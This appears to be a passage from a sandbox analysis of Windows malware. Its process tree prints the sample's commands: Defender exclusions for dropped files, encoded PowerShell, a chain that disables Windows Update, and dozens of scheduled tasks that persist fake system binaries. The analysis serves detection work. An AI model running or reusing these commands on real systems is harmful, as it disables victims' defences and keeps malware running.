- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\084edc7b5451c4e18a20ca7982787742.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\dwm.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\SppExtComObj.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\wininit.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\winlogon.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\dwm.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppReadiness\084edc7b5451c4e18a20ca7982787742.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\StartMenuExperienceHost.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\regid.1991-06.com.microsoft\RuntimeBroker.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\es-ES\csrss.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\WmiPrvSE.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\Registry.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\Assets\winlogon.exe'
2⤵
PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\RuntimeBroker.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Saved Games\System.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe
"C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe"
2⤵
- UAC bypass
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\62a35cdf-ba41-4f38-a08b-24b70186cdd3.vbs"
3⤵
PID:5476

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f0bbe2e8-42bc-404d-bb28-1335cb078608.vbs"
3⤵
PID:5592

C:\Users\Admin\AppData\Local\Temp\new1.exe
"C:\Users\Admin\AppData\Local\Temp\new1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Users\Admin\AppData\Local\Temp\C4Updater.exe
"C:\Users\Admin\AppData\Local\Temp\C4Updater.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\C4Updater.exe"
4⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAYQB2AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHIAcABwACMAPgAgAEAAKAAgADwAIwB2AGkAdgBnACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBxAHcAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAawBmACMAPgA="
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:5200

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:5336

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:556

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:4248

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:5584

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:4280

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:2236

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:5264

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:2144

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:3456

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:4672

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4152

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3904

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:5536

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:5624

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1964

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:644

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:5044

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:2416

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:1924

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:5636

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:3444

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:2508

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:3432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAaQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABTAG0AYQByAHQAUwBjAHIAZQBlAG4AUQBDAFwARABlAGYAZQBuAGQAZQByAFwARABlAGYAZQBuAGQAZQByAFAAcgBvAHQAZQBjAHQAaQBvAG4ALgBlAHgAZQAiACcAKQAgADwAIwBlAGQAYgB4ACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAbgB5AGwAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB5AGkAeQBnACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBTAG0AYQByAHQAUwBjAHIAZQBlAG4ARABlAGYAZQBuAGQAZQByAFEAQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGEAdQAjAD4AOwA="
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5492

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
3⤵
- Executes dropped EXE
PID:1800

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
4⤵
- Creates scheduled task(s)
PID:5004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\odt\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\odt\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\odt\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\odt\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\odt\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\odt\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\odt\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\odt\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\odt\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\odt\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\odt\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\odt\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "084edc7b5451c4e18a20ca79827877420" /sc MINUTE /mo 14 /tr "'C:\Windows\AppReadiness\084edc7b5451c4e18a20ca7982787742.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "084edc7b5451c4e18a20ca7982787742" /sc ONLOGON /tr "'C:\Windows\AppReadiness\084edc7b5451c4e18a20ca7982787742.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "084edc7b5451c4e18a20ca79827877420" /sc MINUTE /mo 5 /tr "'C:\Windows\AppReadiness\084edc7b5451c4e18a20ca7982787742.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\odt\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\odt\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\odt\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\Assets\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\Assets\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\Assets\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\Vss\Writers\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1444

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Vss\Writers\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Saved Games\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\Saved Games\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Saved Games\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:936

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
1⤵
- Executes dropped EXE
PID:3424

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

